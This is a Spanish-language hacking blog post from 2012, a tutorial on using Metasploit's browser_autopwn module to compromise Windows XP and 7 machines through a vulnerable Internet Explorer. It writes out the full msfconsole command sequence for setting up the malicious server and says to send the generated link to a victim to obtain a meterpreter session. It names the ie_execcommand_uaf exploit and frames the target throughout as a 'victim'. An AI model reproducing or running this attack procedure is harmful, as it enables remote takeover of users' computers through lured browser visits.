31 oct 2012

[Browser Autopwn desde Metasploit] Vulnerando Windows 7-XP (IE 0-day)


En esta pequeña entrada se describirá como utilizar el modulo browser_autopwn incluida en el Metasploit, la cual nos permitirá explotar cualquier tipo de vulnerabilidad que afecten a los navegadores webs, obteniendo asi una session meterpreter en el sistema vulnerable.

Metasploit ofrece la posibilidad de lanzar exploits de acuerdo a la versión del browser que la victima este utilizando, por ejemplo cuando utilizemos el modulo browser_autopwn esta buscara todos los exploits respectivos para cualquier tipo de navegador, ya sea Internet Explorer, Google Chorme, Firefox u Opera, de manera que cuando la victima ejecute el link generado, esta automaticamente se aproveche de la vulnerabilidad encontrada.

Por otro lado, para acceder a cualquier Sistema Windows 7 o XP nos basaremos en la ultima vulnerabilidad 0-day que se registro en el Navegador Internet Explorer versiones 7 - 8 y 9 la cual permite que cualquier 'atacante' puede utilizar el exploit respectivo para tomar acceso completo al sistema.


Veamos un poco mas detallado el trabajo que realiza el modulo browser_autopwn para apoderarse de una forma rápida y fácil de cualquier sistema Windows.

REQUERIMIENTOS:

Backtrack 5 R1 - R2 o R3 (Atacante)
Metasploit Framework (Atacante)
Windows XP - 7 (Victima)

PROCEDIMIENTO DEL ATAQUE:

Abrimos Metasploit (msfconsole) y ejecutamos los siguientes comandos:
----------------------------------------------------------------------------------
use auxiliary/server/browser_autopwn (Usar el modulo browser_autopwn)
set lhost 192.168.1.17 (IP del Atacante) 
set srvhost 192.168.1.17 (IP del Atacante)
set uripath / (Path del link a enviar)
set srvport 80 (Puerto)
exploit
----------------------------------------------------------------------------------

Después de ejecutar el comando exploit, browser_autopwn empezara a buscar todos los exploits que pueda afectar a cualquier Navegador Web, ya sea en las vulnerabilidades de Java, Flash Player, WinZip, Apple Quick Time y unos cuantos mas, siempre y cuando tengamos el MSF actualizado.


Luego que la herramienta termine de 'buscar' todos los exploits que afecten a los navegadores, esta mostrara cuantos exploits ha encontrado y generara un link la cual sera enviada a la victima, como se aprecia en la imagen siguiente:

Como se aprecia en la imagen, browser_autopwn encontró 39 exploits y genero una URL http://192.168.1.17:80/ la misma que sera enviada a la victima para que lo ejecute desde su navegador, de tal manera que esta URL pueda ejecutar cualquier exploit en forma silenciosa y generar la conexion inversa. 

Para tal caso, he ejecutado dicha URL en un Sistema Windows XP con Internet Explorer 7, de tal forma que browser_autopwn pueda ejecutar el exploit respectivo para el Navegador, la cual si logra ejecutarse sin problema alguno, esta devolverá una session meterpreter, como se aprecia en la imagen siguiente:


Claramente se aprecia la forma en que trabaja browser_autopwn ya que la URL se ejecuto en un Navegador Internet Explorer, entonces esta inmediatamente ejecuto el ultimo exploit ie_execcommand_uaf de tal forma que el sistema quedo totalmente VULNERADO!

Seguidamente, podemos utilizar los comandos respectivos para mostrar la información total del sistema y algunos que otros comandos que se requiera dependiendo de lo que deseemos hacer en dicho sistema.


Como mencione lineas arriba, esto puede funcionar en cualquier Navegador Web y cualquier Sistema Operativo Windows, solo basta con tener nuestro MSF totalmente actualizado y estar al tanto de las ultimas vulnerabilidades que pueden afectar a los mismos!

VIDEO-DEMOSTRATIVO:



Saludos ;)



Author & Editor

Ingeniero, me gusta la cyberseguridad, la programación y el blockchain.

0 Notaciones:

Publicar un comentario

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (30) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (2) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Dev (1) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (135) Hack Tips (63) Hacked (6) Hacking (19) Hacking Hardware (5) HashCat (1) Herramientas (125) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (6) Leaks (22) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (200) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Ransomware (1) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (150) Seguridad Web (139) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (16) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (65) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.